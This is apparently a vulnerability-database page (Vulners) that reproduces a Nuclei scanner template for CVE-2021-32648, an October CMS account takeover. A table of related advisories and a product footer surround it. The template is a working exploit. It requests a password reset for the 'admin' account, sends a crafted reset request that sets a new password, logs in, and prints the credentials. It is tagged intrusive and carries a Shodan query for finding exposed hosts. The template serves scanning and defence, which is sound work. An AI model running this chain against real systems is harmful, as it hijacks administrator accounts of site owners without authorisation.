| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Exploit for Improper Authentication in Octobercms October | 14 Jan 202215:50 | – | githubexploit | |
| Russian Military Cyber Actors Target US and Global Critical Infrastructure | 5 Sep 202412:00 | – | ics | |
| CVE-2021-32648 | 26 Aug 202100:00 | – | attackerkb | |
| The vulnerability of the CMS system October CMS, related to the lack of a password recovery mechanism, allows attackers to gain access to any user account at will. | 20 Sep 202100:00 | – | bdu_fstec | |
| CVE-2021-32648 | 26 Aug 202122:27 | – | circl | |
| October CMS Improper Authentication | 18 Jan 202200:00 | – | cisa_kev | |
| CISA Adds 13 Known Exploited Vulnerabilities to Catalog | 18 Jan 202200:00 | – | cisa | |
| Octobercms 安全漏洞 | 26 Aug 202100:00 | – | cnnvd | |
| October CMS Authentication Bypass (CVE-2021-32648) | 2 Feb 202200:00 | – | checkpoint_advisories | |
| CVE-2021-32648 | 26 Aug 202119:00 | – | cve |
id: CVE-2021-32648
info:
name: OctoberCMS - Account Takeover
author: daffainfo
severity: high
description: |
octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
impact: |
Unauthenticated attackers can request password resets and gain unauthorized access to user accounts including administrator accounts using a specially crafted request.
remediation: |
Upgrade to October CMS Build 472 or v1.1.5 or later.
reference:
- https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc
- https://github.com/Immersive-Labs-Sec/CVE-2021-32648
- https://nvd.nist.gov/vuln/detail/CVE-2021-32648
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2021-32648
cwe-id: CWE-287,NVD-CWE-Other
epss-score: 0.90418
epss-percentile: 0.99787
cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: octobercms
product: october
shodan-query: http.component:"october cms"
tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev,vuln
variables:
reset_token: "{{rand_base(42)}}"
username: "admin"
password: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /backend/backend/auth/restore HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "<meta","csrf-token","Restore")'
- 'contains(content_type, "text/html")'
condition: and
internal: true
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- '<meta name="csrf-token" content="([0-9a-zA-Z]+)">'
internal: true
- raw:
- |
POST /backend/backend/auth/restore HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{csrf_token}}&postback=1&login={{username}}
- |
POST /backend/backend/auth/reset/1/{{reset_token}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"_token":"{{csrf_token}}","postback":1,"id":1,"code":true,"password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
internal: true
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "_session_key","_token","Login")'
- 'contains(content_type, "text/html")'
condition: and
internal: true
extractors:
- type: regex
name: session_key
part: body
group: 1
regex:
- '<input name="_session_key" type="hidden" value="([0-9a-zA-Z]+)">'
internal: true
- raw:
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_session_key={{session_key}}&_token={{csrf_token}}&postback=1&login={{username}}&password={{password}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "october_session="
- "admin_auth="
condition: and
- type: status
status:
- 302
extractors:
- type: dsl
dsl:
- '"Username: " + username + ". Password: "+ password'
# digest: 4a0a0047304502200adcbe67be60dcf40a307a8ef710d077980a17cb74c8084e160f410e5d991de4022100fdfa524527a53e965241b7dc74718a230dea0032147cd09ac4fba1bef1665910:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation